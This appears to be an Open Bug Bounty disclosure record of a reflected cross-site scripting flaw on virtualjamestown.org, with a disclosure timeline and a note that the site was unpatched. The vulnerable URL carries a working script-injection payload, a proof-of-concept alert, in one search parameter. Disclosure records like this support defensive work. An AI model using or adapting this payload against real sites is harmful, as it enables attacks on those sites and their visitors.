virtualjamestown.org XSS vulnerability

2017-06-19T15:13:00
ID OBB:250086
Type openbugbounty
Reporter xssbuddy
Modified 2017-06-26T16:14:00

Description

Vulnerable URL:
http://www.virtualjamestown.org/indentures/search_indentures.cgi?search_type=basic&start_page=0&db=bristol_ind&servant_ln=1%22%27--!%3E%3Cscript%3Ealert('OPENBUGBOUNTY')%3C/script%3E&servant_fn=&servant_place=&servant_occ=&destination=&ship=&year-ops=&year=&year1=&agent_ln=Davis&agent_fn=Thomas&agent_place=&agent_occ=planter&result_order=&submit=Initiate%20Search#

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 29.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1258670
VIP website status:| No
Check virtualjamestown.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 June, 2017 15:13 GMT
Generic security notifications sent to website owner| 19 June, 2017 15:15 GMT
Notification sent to subscribers (without technical details)| 19 June, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 26 June, 2017 16:14 GMT